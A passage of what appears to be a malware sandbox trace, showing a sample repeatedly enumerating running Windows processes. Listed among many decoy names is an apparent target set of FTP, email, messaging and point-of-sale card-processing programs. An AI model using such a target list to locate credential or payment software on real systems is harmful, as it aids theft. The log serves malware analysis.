lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0238.368] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0238.370] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0238.423] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0238.425] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0238.426] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0238.428] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0238.430] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0238.431] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0238.433] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0238.438] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0238.440] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0238.441] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0238.443] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0238.444] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0238.445] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0238.447] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0238.448] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0238.452] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0238.454] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0238.455] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0238.457] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0238.458] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0238.460] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0238.461] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0238.463] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0238.481] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0238.483] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0238.484] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0238.486] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0238.488] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0238.489] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0238.491] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0238.493] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0238.494] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0238.496] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0238.500] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0238.502] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0238.503] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0238.505] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0238.506] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0238.508] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0238.510] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0238.511] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0238.515] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0238.517] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0238.519] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0238.520] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0238.522] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0238.523] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0238.525] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0238.526] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0238.580] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0238.581] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0238.583] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0238.585] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0238.586] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0238.588] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0238.589] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0238.594] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0238.595] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0238.597] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0238.599] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0238.600] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.601] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0238.603] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0238.604] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0238.609] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0238.610] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0238.612] CloseHandle (hObject=0x1494) returned 1 [0238.612] Sleep (dwMilliseconds=0x64) [0238.720] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0238.730] Process32First (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.735] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0238.737] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0238.739] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.741] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0238.743] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.745] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0238.751] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0238.753] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0238.754] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.755] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.757] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0238.758] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.760] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 